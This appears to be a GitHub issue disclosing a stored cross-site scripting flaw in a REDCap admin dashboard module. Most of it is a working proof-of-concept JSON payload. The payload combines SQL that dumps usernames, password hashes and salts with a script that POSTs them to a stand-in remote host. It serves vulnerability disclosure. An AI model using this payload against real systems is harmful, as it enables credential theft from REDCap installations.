XSS vulnerability - Githubissues

Admin Dashboard 3.5.2 has a cross site scripting vulnerability.

When creating a new project (POSTing to /ExternalModules/?prefix=admin_dash&page=requestHandler&type=saveReportSettings), a malicious user can inject JavaScript into the "description" field. The example JSON below injects JavaScript that will POST the contents of _UIOWAAdminDash.data (in this case a dump of the table redcap_auth) to a remote server (in this case localhost).

{
    "reportReference": [{
        "reportName": "Pwned",
        "description": "<script>$.ajax({ url:'http://localhost:4444', data: JSON.stringify(UIOWA_AdminDash.data), method:'POST', success: function(){alert('Data exfiltrated');} });</script>",
        "tabIcon": "biohazard",
        "customID": "",
        "sql": "select username,password,password_salt from redcap_auth",
        "type": "table",
        "checked": true,
        "formatting": {
            "0": {
                "column": "username",
                "display": 0,
                "link": "not set"
            },
            "1": {
                "column": "password",
                "display": 0,
                "link": "not set"
            },
            "2": {
                "column": "password_salt",
                "display": 0,
                "link": "not set"
            }
        }
    }],
    "adminVisibility": {
        "Projects by User": true,
        "Users by Project": true,
        "Research Projects": true,
        "Development Projects": true,
        "All Projects": true,
        "Projects with External Modules": true,
        "Pwned": true
    },
    "executiveVisibility": {
        "Projects by User": [],
        "Users by Project": [],
        "Research Projects": [],
        "Development Projects": [],
        "All Projects": [],
        "Projects with External Modules": [],
        "Pwned": []
    }
}

To fix this, please sanitize all user input.

ui-icts / redcap-admin-dashboard

XSS vulnerability #6